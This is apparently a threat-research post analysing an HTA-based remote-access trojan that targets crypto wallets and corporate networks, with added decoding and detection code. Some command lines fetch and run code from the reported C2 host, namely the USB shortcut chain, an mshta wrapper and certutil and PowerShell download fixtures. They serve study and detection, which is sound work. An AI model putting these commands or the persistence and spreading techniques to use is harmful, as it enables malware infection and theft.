Announcing “UpdateHub RAT”

1. Executive Summary

This report documents the analysis of a sophisticated HTML Application (HTA) malware sample designed for cryptocurrency wallet theft and corporate network reconnaissance. The malware employs XOR-based string obfuscation, establishes persistence via Windows Task Scheduler, and communicates with command-and-control (C2) infrastructure over HTTPS using a custom XOR-plus-Base64 body encoding and JWT bearer authentication.

Key Findings:

  • Primary targets: Ledger, Trezor, Atomic, Exodus, Guarda, KeepKey, and BitBox02 cryptocurrency wallets

  • Extensive Active Directory reconnaissance capabilities indicate corporate environment targeting

  • USB spreading functionality via malicious LNK file replacement

  • CrowdStrike Falcon detection with execution method modification

  • C2 dependency: malware requires live C2 server to execute (anti-analysis)

2. Sample Information

Summary of Sample Information

3. Obfuscation Analysis

The malware employs two XOR-based string decoders to hide operational strings from static analysis.

3.1 Primary Decoder (_dgaily)

Decodes the HTA application configuration used to hide the execution window:

Algorithm: XOR with rolling key (index * 137 + 140) & 0xFF

Output: <HTA:APPLICATION BORDER='none' SHOWINTASKBAR='no' SYSMENU='no' WINDOWSTATE='minimized'>

3.2 Secondary Decoder (_dd7j5a)

Decodes all 271 operational strings including COM objects, WMI queries, file paths, and C2 endpoints.

Algorithm: XOR with rolling key (index * 107 + 218) & 0xFF
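Both decoders are the same routine with different constants. The block below is an added example (not code from the sample or from the post) that implements the position-keyed XOR decoder described in 3.1 and 3.2 and, because the key schedule is linear in the index, recovers the (multiplier, offset) pair from a single known plaintext. It assumes the encoded strings are arrays of byte values, which is what the decoder loop quoted later in the post (testackS[i] ^ key) suggests; the ciphertext used here is constructed by re-encoding the known primary-decoder output, since the post does not reproduce the sample's raw byte arrays.

```javascript
// Added example (not code from the sample or the post): the position-keyed XOR
// decoder described in 3.1 and 3.2, plus a known-plaintext recovery of the
// (multiplier, offset) pair for a variant whose constants are unknown.
// Assumption: encoded strings are arrays of byte values.

// Generic decoder: the key for byte i is (i * mul + add) & 0xFF.
function rollingXorDecode(bytes, mul, add) {
  let out = "";
  for (let i = 0; i < bytes.length; i++) {
    out += String.fromCharCode(bytes[i] ^ ((i * mul + add) & 0xff));
  }
  return out;
}

// XOR is its own inverse, so the same key schedule encodes a string.
function rollingXorEncode(text, mul, add) {
  const out = [];
  for (let i = 0; i < text.length; i++) {
    out.push((text.charCodeAt(i) & 0xff) ^ ((i * mul + add) & 0xff));
  }
  return out;
}

// Constants as reported for this sample.
const PRIMARY = { mul: 137, add: 140 };   // _dgaily: HTA window configuration
const SECONDARY = { mul: 107, add: 218 }; // _dd7j5a: the 271 operational strings

// Known-plaintext recovery. keystream[i] = cipher[i] ^ plain[i]; with two or
// more bytes, add = keystream[0] and mul = keystream[1] - keystream[0] (mod 256)
// are fixed, so a scan over all 65,536 pairs finds exactly one fit. Use this
// when a new build keeps the i*mul+add schedule but changes the constants.
function recoverKeyParams(bytes, plaintext) {
  if (bytes.length !== plaintext.length || bytes.length < 2) return null;
  const ks = Array.from(bytes, (b, i) => b ^ (plaintext.charCodeAt(i) & 0xff));
  for (let mul = 0; mul < 256; mul++) {
    for (let add = 0; add < 256; add++) {
      let ok = true;
      for (let i = 0; i < ks.length && ok; i++) {
        ok = ((i * mul + add) & 0xff) === ks[i];
      }
      if (ok) return { mul, add };
    }
  }
  return null;
}

// The primary decoder's known output, re-encoded here as a constructed
// ciphertext (the post does not reproduce the sample's raw byte array).
const HTA_CONFIG =
  "<HTA:APPLICATION BORDER='none' SHOWINTASKBAR='no' SYSMENU='no' WINDOWSTATE='minimized'>";
const HTA_CONFIG_ENCODED = rollingXorEncode(HTA_CONFIG, PRIMARY.mul, PRIMARY.add);

function demo() {
  return {
    decoded: rollingXorDecode(HTA_CONFIG_ENCODED, PRIMARY.mul, PRIMARY.add),
    // Decoding with the wrong schedule yields garbage, not an error.
    wrongKey: rollingXorDecode(HTA_CONFIG_ENCODED, SECONDARY.mul, SECONDARY.add),
    recovered: recoverKeyParams(HTA_CONFIG_ENCODED, HTA_CONFIG),
  };
}

console.log(demo());
```

To bulk-decode a sample, pull each encoded array out of the script, pass it to rollingXorDecode with the constants from the matching decoder function, and diff the result against the string list in section 12; the recovery routine is for the day a new build ships with different constants.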

4. Command & Control Infrastructure

4.1 C2 Domain Pattern

The malware iterates through 11 C2 domain variants with failover capability:

https://s{i}-updatehub.cc where {i} = 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, (empty)

4.3 Communication Encryption

  • Request body encrypted with 6-digit random XOR key prepended to payload

  • Custom Base64 encoding with UTF-16LE conversion

  • Response uses same XOR + Base64 scheme

  • JWT token-based authentication (Authorization: Bearer {jwt})
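The post gives the shape of the body framing (a random 6-digit XOR key prepended, Base64 over a UTF-16LE conversion, the same scheme on responses) but not the byte-level details. The block below is an added example, not code from the sample or the post, that models that scheme so an analyst can decode captured bodies; the assumptions are that the six key digits are applied as ASCII characters cycled over the payload bytes and that the payload is converted to UTF-16LE before the XOR. The practitioner's point does not depend on those assumptions: the key rides in cleartext at the front of every body, so this is obfuscation, not encryption, and captured traffic is decodable without any secret. The registration payload is constructed from the parameter names reported in section 5.

```javascript
// Added example (not code from the sample or the post): a model of the beacon
// body framing described in 4.3. Assumptions: the 6-digit key is used as ASCII
// digits cycled over the payload bytes; payload is UTF-16LE before the XOR.

function randomSixDigitKey() {
  return String(Math.floor(Math.random() * 1e6)).padStart(6, "0");
}

// XOR each byte with the char code of key[i % 6]. Symmetric, so it decodes too.
function xorWithKey(buf, key) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key.charCodeAt(i % key.length);
  return out;
}

// Client side: key + Base64(XOR(UTF-16LE(payload), key)).
function frameBody(payload, key = randomSixDigitKey()) {
  return key + xorWithKey(Buffer.from(payload, "utf16le"), key).toString("base64");
}

// 6 digits, then Base64 (padded, so its length is a multiple of 4).
const BODY_RE = /^(\d{6})([A-Za-z0-9+/]+={0,2})$/;

// Analyst side: recover the plaintext from a captured request or response body.
function unframeBody(body) {
  const m = BODY_RE.exec(body);
  if (!m || m[2].length % 4 !== 0) return null;
  const [, key, b64] = m;
  return xorWithKey(Buffer.from(b64, "base64"), key).toString("utf16le");
}

// The shape test behind 14.1's "6-digit numeric prefix" recommendation. On its
// own it is weak (plenty of benign bodies start with digits); pair it with the
// originating process being mshta.exe and a *-updatehub.cc destination.
function looksLikeBeaconBody(body) {
  const m = BODY_RE.exec(body);
  return m !== null && m[2].length % 4 === 0;
}

// Constructed registration payload using the parameter names reported in 5.
const SAMPLE_PAYLOAD = "ledger=true&wallets=false";

console.log(frameBody(SAMPLE_PAYLOAD, "482913"));
console.log(unframeBody(frameBody(SAMPLE_PAYLOAD)));
```

If a real capture fails to round-trip through unframeBody, the first things to vary are the two assumptions above (digit value versus digit char code, and whether the UTF-16LE step happens before or after the XOR); the key position and the Base64 layer are as the post describes.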

This RAT won’t continue full execution without reaching and then authenticating with the C2 Server

Authentication Required for Continued Execution

Without network authentication with the C2, the furthest the execution gets is mshta.exe executing the HTA and enumeration of the system, but none of the post-initial execution beyond that occurs. I tried setting up a fake C2 that could catch the request from the RAT, but I can't or didn't want to spend the time trying to set up the authentication parameters, and since I have the code, the code review provides all I need.

5. Cryptocurrency Wallet Targeting

The malware specifically checks for the presence of popular cryptocurrency wallet applications:

Detection results are transmitted to C2 via ledger=true/false and wallets=true/false parameters in the registration beacon.

6. Persistence Mechanism

The malware establishes persistence via Windows Task Scheduler, masquerading as a legitimate Google Update task.

6.1 Scheduled Task Configuration

6.2 Task Settings

  • StartWhenAvailable: true

  • DisallowStartIfOnBatteries: false

  • StopIfGoingOnBatteries: false

  • WakeToRun: true

  • RunLevel: 1 (Highest) if admin privileges detected
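The task names in 12.3 are built to look like Google's updater tasks, so the discriminator recommended in 14.2 is the action path, not the name. The block below is an added example, not code from the sample or the post, that triages exported scheduled-task XML (schtasks /query /tn <name> /xml) against the task profile above. The post does not show the task's action, so the malicious fixture's mshta.exe command and C2 URL are assumptions, as are both GUIDs; the legitimate fixture is modelled on Google's GoogleUpdate.exe task. Element extraction is a regex over the known Task Scheduler element names rather than a full XML parser.

```javascript
// Added example (not code from the sample or the post): triage of exported
// Task Scheduler XML against the persistence profile in 6.1/6.2 and 12.3,
// implementing 14.2's "Google in the name, non-Google executable" check.

function tagText(xml, name) {
  const m = new RegExp(`<${name}>([^<]*)</${name}>`).exec(xml);
  return m ? m[1].trim() : null;
}

// Where Google's own updaters live; anything else under a "Google" task name
// is the alert condition.
const GOOGLE_PATH = /^"?C:\\Program Files( \(x86\))?\\Google\\/i;

function assessTask(xml) {
  const name = tagText(xml, "URI") || "";
  const cmd = tagText(xml, "Command") || "";
  const args = tagText(xml, "Arguments") || "";
  const strong = [];
  const weak = [];

  if (/google/i.test(name) && !GOOGLE_PATH.test(cmd)) {
    strong.push(`Google-named task runs ${cmd || "(no command)"}`);
  }
  if (/(^|\\)mshta(\.exe)?$/i.test(cmd)) strong.push("action is mshta.exe");
  if (/https?:\/\//i.test(args)) strong.push(`action takes a URL: ${args}`);

  // The settings from 6.2 maximise run opportunities. Legitimate tasks use
  // them too, so they only add weight.
  if (tagText(xml, "StartWhenAvailable") === "true") weak.push("StartWhenAvailable");
  if (tagText(xml, "WakeToRun") === "true") weak.push("WakeToRun");
  if (tagText(xml, "StopIfGoingOnBatteries") === "false") weak.push("no StopIfGoingOnBatteries");
  if (tagText(xml, "RunLevel") === "HighestAvailable") weak.push("RunLevel HighestAvailable");

  return { name, suspicious: strong.length > 0, strong, weak };
}

// Constructed fixtures in Task Scheduler's export format, trimmed to the
// elements used above. Action and GUIDs are assumptions.
const MALICIOUS_TASK = String.raw`<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleTaskSystem136.0.7023.12{0d1f6c1e-6a8e-4a4b-9d4e-000000000001}</URI></RegistrationInfo>
  <Settings>
    <StartWhenAvailable>true</StartWhenAvailable>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <WakeToRun>true</WakeToRun>
  </Settings>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>mshta.exe</Command><Arguments>https://s1-updatehub.cc</Arguments></Exec></Actions>
</Task>`;

const LEGIT_TASK = String.raw`<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleUpdateTaskMachineUA{0d1f6c1e-6a8e-4a4b-9d4e-000000000002}</URI></RegistrationInfo>
  <Settings>
    <StartWhenAvailable>true</StartWhenAvailable>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <WakeToRun>false</WakeToRun>
  </Settings>
  <Actions><Exec><Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command><Arguments>/ua /installsource scheduler</Arguments></Exec></Actions>
</Task>`;

console.log(assessTask(MALICIOUS_TASK));
console.log(assessTask(LEGIT_TASK));
```

Run it over every task under C:\Windows\System32\Tasks (the files there are this same XML) and review anything with a non-empty strong list; the weak list is context for the analyst, not a trigger.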

7. Payload Delivery Methods

The malware employs seven different download methods with automatic fallback to ensure payload delivery success:

8. C2 Task Types

The malware supports the following task types received from the C2 server:

9. Anti-Analysis Techniques

9.1 C2 Dependency (Primary Blocker)

The malware requires a live C2 server to execute any malicious functionality. It iterates through all 11 C2 domain variants and exits silently if none respond with ‘success’. This effectively prevents dynamic analysis in isolated environments.
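The failover walk in 4.1 and the success gate described here are one loop. The block below is an added example, not code from the sample or the post, that reproduces that loop with the HTTP call injected so it runs offline. The host order (s10 down to s1, then the bare s- host) and the "success" response are as the post describes; that the check is an exact string compare is an assumption, and the responder standing in for the network is constructed.

```javascript
// Added example (not code from the sample or the post): the C2 selection loop
// from 4.1 and 9.1 with the network call injected. Assumption: the gate is an
// exact compare against the string "success".

function c2Candidates(base = "updatehub.cc") {
  return [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, ""].map((n) => `https://s${n}-${base}`);
}

// probe(url) returns the response body or throws on any network error.
// Returns the first host that answers "success", or null (the silent exit),
// together with the hosts that were contacted on the way.
function findLiveC2(probe, candidates = c2Candidates()) {
  const tried = [];
  for (const url of candidates) {
    tried.push(url);
    let body = null;
    try { body = probe(url); } catch (e) { /* swallowed, like the sample's try/catch */ }
    if (body === "success") return { live: url, tried };
  }
  return { live: null, tried };
}

// Constructed stand-in for the network: everything refuses except s3.
function fakeProbe(url) {
  if (url === "https://s3-updatehub.cc") return "success";
  throw new Error("ECONNREFUSED " + url);
}

console.log(findLiveC2(fakeProbe));
```

For a sandbox, this first gate is satisfied by resolving any of the 11 names to a responder that returns the literal "success"; the JWT handshake the post describes next still has to be emulated before the post-registration tasks in section 8 run, which is the part the author did not attempt.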

9.2 Self-Deletion

The zonexi() function deletes the HTA file immediately upon execution using Scripting.FileSystemObject.DeleteFile().

Before execution:

.hta file present before execution “a7ef…”

After Executing UpdateHub RAT:

.hta file is removed, self deletion

9.3 Security Product Detection

When CrowdStrike Falcon is detected, the malware modifies its execution method to use a cmd.exe wrapper: cmd.exe /c start "" /b mshta.exe {url}

9.4 Additional Techniques

  • Window Hiding: HTA configured with hidden window, plus window.resizeTo(0,0) and window.moveTo(-10000,-10000)

  • Silent Failures: All code wrapped in try/catch blocks to swallow errors

  • Admin Detection: Checks HKLM\SECURITY access via StdRegProv.GetSecurityDescriptor

  • Auto-Close: window.close() called at end of execution

10. USB Spreading Mechanism

Task Type 9 implements USB spreading functionality that targets removable drives.

10.1 Target File Types

.exe, .docx, .pdf, .doc

10.2 Infection Process

  1. Enumerate removable drives (USB, external) via WMI Win32_DiskDrive

  2. Scan for target file types (depth limited to 2 directories)

  3. Hide original files by setting hidden attribute

  4. Create .lnk shortcuts with same base name

  5. Shortcut executes: cmd.exe /c start "" ".\{original}" & start "" mshta "{C2_URL}"
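The infection chain above leaves a specific on-disk pairing that 14.2 recommends hunting for: a .lnk next to a now-hidden file with the same base name. The block below is an added example, not code from the sample or the post, that finds those pairs in a directory listing and checks each shortcut's command line against the pattern in step 5. The listing and the LNK targets are constructed; the URL inside them is the bare s1/s2 host from 4.1 rather than whatever full URL the sample embeds, and the example assumes the LNK target string has already been extracted by a forensic tool.

```javascript
// Added example (not code from the sample or the post): detection of the USB
// decoy pattern in 10.2 (14.2: "LNK file creation alongside hidden files").

const TARGET_EXT = new Set([".exe", ".docx", ".pdf", ".doc"]);

// Step 5 of the infection chain: start the hidden original, then mshta <url>.
const LNK_CHAIN = /start\s+""\s+"\.\\[^"]+"\s*&\s*start\s+""\s+mshta\s+"https?:\/\/[^"]+"/i;

function splitExt(name) {
  const i = name.lastIndexOf(".");
  return i <= 0 ? [name, ""] : [name.slice(0, i), name.slice(i).toLowerCase()];
}

// entries: [{ path, hidden, target? }] for one removable volume, where target
// is the shortcut's command line (assumed already extracted).
function findLnkDecoys(entries) {
  const byDir = new Map();
  for (const e of entries) {
    const cut = e.path.lastIndexOf("\\");
    const dir = e.path.slice(0, cut);
    if (!byDir.has(dir)) byDir.set(dir, []);
    byDir.get(dir).push({ ...e, name: e.path.slice(cut + 1) });
  }
  const hits = [];
  for (const [dir, files] of byDir) {
    // Hidden originals of a targeted type, keyed by lower-cased base name.
    const hiddenOriginals = new Map();
    for (const f of files) {
      const [base, ext] = splitExt(f.name);
      if (f.hidden && TARGET_EXT.has(ext)) hiddenOriginals.set(base.toLowerCase(), f.name);
    }
    for (const f of files) {
      const [base, ext] = splitExt(f.name);
      if (ext !== ".lnk") continue;
      const original = hiddenOriginals.get(base.toLowerCase());
      if (!original) continue;
      hits.push({
        dir,
        lnk: f.name,
        hiddenOriginal: original,
        launchesMshta: LNK_CHAIN.test(f.target || ""),
      });
    }
  }
  return hits;
}

// Constructed listing of an infected drive; setup.lnk is a normal shortcut
// next to a visible setup.exe and must not be flagged.
const USB_LISTING = [
  { path: "E:\\report.docx", hidden: true },
  { path: "E:\\report.lnk", hidden: false,
    target: 'cmd.exe /c start "" ".\\report.docx" & start "" mshta "https://s1-updatehub.cc"' },
  { path: "E:\\invoices\\q3.pdf", hidden: true },
  { path: "E:\\invoices\\q3.lnk", hidden: false,
    target: 'cmd.exe /c start "" ".\\q3.pdf" & start "" mshta "https://s2-updatehub.cc"' },
  { path: "E:\\photos\\holiday.jpg", hidden: false },
  { path: "E:\\setup.exe", hidden: false },
  { path: "E:\\setup.lnk", hidden: false, target: "C:\\Tools\\setup.exe" },
];

console.log(findLnkDecoys(USB_LISTING));
```

A hit without launchesMshta still deserves a look (a variant may change the shortcut command), while a hit with it is the full chain from step 5 and the drive should be treated as infected.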

11. Active Directory Reconnaissance

Task Type 5 triggers comprehensive AD reconnaissance, indicating corporate environment targeting:

11.1 Information Collected

11.2 Enumeration Methods

  • WMI: Win32_ComputerSystem, Win32_NTDomain, Win32_Group, Win32_GroupUser

  • ADSI: AdsNameSpaces COM object with WinNT:// provider

  • Environment: LOGONSERVER variable for DC identification

12. Indicators of Compromise (IOCs)

12.1 Network Indicators

  • https://s[1-10]-updatehub.cc (C2 domains)

  • https://s-updatehub.cc (C2 domain, no number)

  • HTTP POST requests with 6-digit prefix + Base64 encoded body

12.2 File System Indicators

  • %userprofile%\*.exe (downloaded payloads)

  • %TEMP%\{random9}.txt (command output)

  • .lnk files replacing documents on USB drives

12.3 Scheduled Tasks

  • GoogleTaskSystem136.0.7023.12{GUID}

  • GoogleUpdaterTaskSystem136.1.7023.12{GUID}

12.4 Process Artifacts

  • mshta.exe spawning cmd.exe, powershell.exe

  • powershell.exe -ep Bypass -nop

  • bitsadmin.exe /transfer

  • certutil.exe -urlcache

  • rundll32.exe for DLL execution

13. MITRE ATT&CK Mapping

14. Detection Recommendations

14.1 Network Detection

  1. Block/monitor DNS queries and HTTP traffic to *-updatehub.cc domains

  2. Alert on HTTP POST requests with 6-digit numeric prefix in body

  3. Monitor for mshta.exe making external HTTP connections

14.2 Endpoint Detection

  • Monitor mshta.exe spawning cmd.exe, powershell.exe, or network-related processes

  • Alert on scheduled task creation with “Google” in name but non-Google executable paths

  • Detect WMI queries to SecurityCenter2 from scripting hosts

  • Monitor certutil.exe and bitsadmin.exe used for file downloads

  • Alert on mass file attribute changes on removable drives

  • Monitor for LNK file creation alongside hidden files on USB drives
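The process artifacts in 12.4 and the endpoint recommendations above reduce to two checks: parent/child lineage under mshta.exe and a handful of command-line patterns. The block below is an added example, not code from the sample or the post, that runs those checks over a constructed set of process-creation events with Sysmon event 1 style fields. The HTA file name, the PIDs and the download target path are made up; the mshta to cmd.exe to mshta chain mirrors the Falcon-present wrapper in 9.3.

```javascript
// Added example (not code from the sample or the post): the endpoint lineage
// and command-line checks from 12.4 and 14.2 over constructed events.

function imageName(path) {
  return path.slice(path.lastIndexOf("\\") + 1).toLowerCase();
}

// Children of mshta.exe that the post lists as artifacts; 14.2 also says
// "network-related processes", so extend the set for your environment.
const MSHTA_CHILDREN = new Set(["cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe"]);

const CMDLINE_RULES = [
  { id: "powershell-bypass", image: "powershell.exe", re: /-ep\s+bypass\b.*-nop\b|-nop\b.*-ep\s+bypass\b/i },
  { id: "bitsadmin-transfer", image: "bitsadmin.exe", re: /\/transfer\b/i },
  { id: "certutil-urlcache", image: "certutil.exe", re: /-urlcache\b/i },
  { id: "mshta-remote-url", image: "mshta.exe", re: /https?:\/\//i },
];

// events: [{ pid, ppid, image, cmdline }]. Returns one alert per rule hit.
function detectHtaChain(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const alerts = [];
  for (const e of events) {
    const img = imageName(e.image);
    const parent = byPid.get(e.ppid);
    if (parent && imageName(parent.image) === "mshta.exe" && MSHTA_CHILDREN.has(img)) {
      alerts.push({ rule: "mshta-spawns-lolbin", pid: e.pid, detail: `${img} <- mshta.exe (pid ${parent.pid})` });
    }
    for (const r of CMDLINE_RULES) {
      if (img === r.image && r.re.test(e.cmdline)) alerts.push({ rule: r.id, pid: e.pid, detail: e.cmdline });
    }
  }
  return alerts;
}

// Constructed events. pid 300 is a benign scheduled PowerShell script and
// must produce nothing.
const EVENTS = [
  { pid: 100, ppid: 1, image: "C:\\Windows\\explorer.exe", cmdline: "explorer.exe" },
  { pid: 200, ppid: 100, image: "C:\\Windows\\System32\\mshta.exe", cmdline: 'mshta.exe "C:\\Users\\victim\\Downloads\\invoice.hta"' },
  { pid: 201, ppid: 200, image: "C:\\Windows\\System32\\cmd.exe", cmdline: 'cmd.exe /c start "" /b mshta.exe https://s1-updatehub.cc' },
  { pid: 202, ppid: 201, image: "C:\\Windows\\System32\\mshta.exe", cmdline: "mshta.exe https://s1-updatehub.cc" },
  { pid: 203, ppid: 200, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", cmdline: 'powershell.exe -ep Bypass -nop -c "iwr https://s1-updatehub.cc"' },
  { pid: 204, ppid: 200, image: "C:\\Windows\\System32\\certutil.exe", cmdline: "certutil.exe -urlcache -split -f https://s1-updatehub.cc %userprofile%\\update.exe" },
  { pid: 300, ppid: 100, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", cmdline: "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1" },
];

console.log(detectHtaChain(EVENTS));
```

Note that the second mshta.exe (pid 202) is not caught by the lineage rule, because its parent is cmd.exe; the command-line rule for a remote URL is what covers the 9.3 wrapper, which is why both checks are needed.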

14.3 YARA Detection Strings

$hta1 = "HTA:APPLICATION" ascii
$sched1 = "Schedule.Service" ascii
$sched2 = "GoogleTaskSystem136" ascii
$crypto1 = "Ledger Live" ascii
$crypto2 = "@trezor" ascii
$wmi1 = "SecurityCenter2" ascii
$wmi2 = "Win32_NTDomain" ascii
$adsi1 = "WinNT://" ascii

Because sections 3.1 and 3.2 show these strings stored XOR-encoded and decoded only at runtime, the plaintext strings above match decoded script text or mshta.exe process memory, not the .hta as it sits on disk. For on-disk matching, sign the decoder itself (the "* 107 + 218 & 255" and "* 137 + 140 & 255" key schedules quoted in section 15), which has to stay in the clear.

15. Attribution

I used Claude to help verify that I could not find an existing matching malware family. Critique and discussion are appreciated! I don't want to falsely believe I've found something new, and I try to be very data-driven; reach out if you disagree.

UpdateHub HTA RAT — Malware Family Comparison Analysis

Executive Summary

Based on extensive research, the UpdateHub HTA RAT appears to be a previously unreported or newly emerged malware family. While it shares TTPs with several known threats, it has unique characteristics that distinguish it from existing documented campaigns.

Similar Malware Families Identified

1. Aggah Campaign / Gorgon Group (HIGHEST SIMILARITY)

Similarity Score: 75%

Assessment: The infection chain is very similar to Aggah, but UpdateHub uses custom C2 infrastructure instead of legitimate services and has USB worm capabilities not seen in Aggah.

2. Spora / Gamarue / RETADUP (USB WORM COMPONENT)

Similarity Score: 60%

Assessment: The USB worm technique is nearly identical to Spora/Gamarue’s LNK spreading method, suggesting the author copied this proven technique.

3. KimJongRAT / BabyShark (KOREAN APT)

Similarity Score: 55%

Assessment: Similar focus on crypto wallets and HTA infection chain, but KimJongRAT is attributed to North Korean actors with different infrastructure patterns.

4. StilachiRAT (Microsoft-documented)

Similarity Score: 50%

Assessment: Similar crypto-stealing objectives but completely different codebase and delivery mechanism.

5. Nova Stealer / Odyssey Stealer (macOS Focus)

Similarity Score: 40%

Assessment: Different platform but similar targeting of hardware wallet users.

Unique Characteristics of UpdateHub RAT

These features distinguish UpdateHub from known families:

1. C2 Domain Failover Pattern

s10-updatehub.cc → s9-updatehub.cc → … → s-updatehub.cc

This numbered failover pattern is not commonly seen in documented malware.

2. Fake Google Update Task Names

GoogleTaskSystem136.0.7023.12{GUID}
GoogleUpdaterTaskSystem136.1.7023.12{GUID}

The specific version numbers (136.0.7023.12) appear unique to this family.

3. XOR Encoding with Multiplier

var tetorY = v31af8 * 107 + 218 & 255;
coreve769 += String.fromCharCode(testackS[v31af8] ^ tetorY);

This specific XOR pattern with position-based key generation is distinctive.

4. Combined Capabilities

No other documented family combines ALL of:

  • HTA-based delivery

  • USB LNK worm spreading

  • Crypto wallet detection (hardware wallets)

  • Extensive AD reconnaissance

  • CrowdStrike Falcon evasion

  • Custom XOR-encrypted C2 protocol

5. JWT-Based Authentication

The use of JWT tokens for C2 session authentication is relatively sophisticated for HTA-based malware.

Attribution Assessment

Possible Origins:

  1. Cybercriminal Operation (Most Likely)

  • Financially motivated (crypto wallet focus)

  • Uses commodity techniques (copied USB worm code)

  • Brazilian C2 infrastructure hint (meusitehostgator.com.br in first sample)

  • No nation-state indicators

  2. Evolution of Aggah/Gorgon Tools

  • Similar infection chain

  • Could be same actors with new infrastructure

  • Different final payload suggests possible code sharing

  3. Commercial Malware-as-a-Service

  • Version numbering suggests ongoing development (v3.3)

  • Multiple download fallbacks suggest testing

  • Task-based modular design

YARA Rule Matching Results

Rules vs Known Families:

The generic rule would also match Aggah and KimJongRAT samples. The detailed rule is specific to UpdateHub and should not false-positive on other families.

Recommendations for Hunting

Search Terms for Existing Intel:

  1. VirusTotal Intelligence:
    content:"updatehub" OR content:"GoogleTaskSystem136" OR
    content:"PT30M" AND content:"P3650D" AND content:"Schedule.Service"

  2. MalwareBazaar:

  • Tag: hta, crypto-stealer, usb-worm

  • Signature: Scheduled task with “Google” impersonation

  3. MISP/OpenCTI:

  • Search for C2: *-updatehub.cc

  • Search for similar HWID patterns

  4. Passive DNS:

  • Query: s?-updatehub.cc (where ? is 1 through 10, plus the bare s-updatehub.cc)

  • Historical resolution data may reveal infrastructure

Conclusion

UpdateHub RAT appears to be a newly documented threat that combines techniques from multiple known malware families:

  • Infection chain resembles Aggah campaign

  • USB worm copied from Spora/Gamarue techniques

  • Crypto targeting similar to modern stealers like KimJongRAT

  • Custom C2 protocol with JWT authentication is unique

The malware should be tracked as a distinct family pending discovery of direct code overlaps with known campaigns. The YARA rules provided should help identify related samples in threat intelligence platforms.

References

  1. Unit42 — Aggah Campaign Analysis

  2. G DATA — Spora Ransomware Worm Analysis

  3. Unit42 — KimJongRAT Stealer Variant

  4. Microsoft — StilachiRAT Analysis

  5. Moonlock — Anti-Ledger Malware Campaign

  6. HP Wolf Security — Aggah Campaign Cryptocurrency Stealer

16. Conclusion

This HTA malware represents a professionally developed multi-stage loader and infostealer with the following characteristics:

  • Strong Evasion: Multiple download methods, hidden execution, security product detection, C2 dependency

  • Corporate Targeting: Extensive AD reconnaissance suggests enterprise environment focus

  • Cryptocurrency Focus: Specific wallet detection for theft operations

  • Self-Propagation: USB spreading via LNK replacement technique

  • Modular Design: Task-based C2 allows flexible payload deployment

The sophistication level and feature set suggest this is likely part of a commercial malware kit or organized threat actor operation targeting both financial (cryptocurrency) and corporate assets. The C2 dependency serves as both an anti-analysis mechanism and a kill switch, preventing execution in isolated analysis environments.
